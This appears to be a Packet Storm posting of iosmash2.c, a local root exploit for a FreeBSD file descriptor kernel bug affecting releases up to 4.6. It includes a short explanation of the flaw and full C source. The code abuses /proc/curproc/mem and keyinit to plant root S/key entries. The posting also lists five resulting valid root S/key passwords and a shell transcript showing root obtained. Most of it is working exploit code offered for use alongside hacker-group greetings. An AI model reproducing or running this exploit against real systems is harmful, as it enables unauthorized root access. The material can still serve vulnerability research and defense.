Iosmash2.c is a local root exploit for the FreeBSD file descriptors kernel bug that resides in all releases of FreeBSD up to and including 4.6-RELEASE. The exploit create 5 valid root passwords that give instant root access trough S/key.
7b28078a9bc5a3407f5939b88d2cf0ec/* Proof Of Concept exploit for the Freebsd file descriptors bug. Freebsd
thought they fixed this months ago well guess again :P Thanks to the
Freebsd kernel you may now enjoy local root on all freebsd <=4.6 ;) */
/* *I AM FREE* *I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I
AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM
FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I
AM FREE* */
DVDMAN(DVDMAN@L33TSECURITY.COM)
Visit Us: irc.efnet.org #l33tsecurity
www.l33tsecurity.com
And Freebsd thought they fixed this :P
GREETS:
thanks phased for skeys from iosmash.c :)
thanks all of #l33tsecurity for support
thanks Georgi Guninski for ideas
Details:
Several months ago Joost Pol <joost@pine.nl> made public almost the same
problem. FreeBSD fixed it, but the patch does not cover all the cases. In
some cases the kernel closes fds 0..2 after they are assigned to /dev/null,
leaving the system open to an attack. If a +s file is execed and fds 0..2
are opened to /proc/curproc/{special} then the kernel forcefully closes
them and open() then reuses them.
this program makes the following skeys valid
95: CARE LIVE CARD LOFT CHIC HILL
96: TESS OIL WELD DUD MUTE KIT
97: DADE BED DRY JAW GRAB NOV
98: MASS OAT ROLL TOOL AGO CAM
99: DARK LEW JOLT JIVE MOS WHO
PROOF:
[dvdman@xxxx:~]$ uname -a
FreeBSD xxx.xx 4.6-STABLE FreeBSD 4.6-STABLE #1: Sat Jul27 20:16:20 GMT 2002 dvdman@xxxx:/usr/obj/usr/src/sys/xxx i386
[dvdman@xxxx:~]$ gcc iosmash2.c
[dvdman@xxxx:~]$ ./a.out
Adding dvdman:
ctrl-c
[dvdman@xxxx:~]$ su
s/key 98 snosoft2
Password:
[root@xxxx:/home/dvdman]#
*/
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <errno.h>
int main(int argc, char *argv[])
{
int f;
int ret;
while(dup(1) != -1) {};
close(2);
close(3);
f=open("/proc/curproc/mem",O_WRONLY);
if (f==-1) fprintf(stdout,"Error in open /proc\n");
fprintf(stdout,"press ctrl-c when adding...");
ret = execl("/usr/bin/keyinit","\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n",0);
if(ret == -1) {
fprintf(stdout,"execl() failed: %s (%d)\n",strerror(errno),errno);
}
}
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!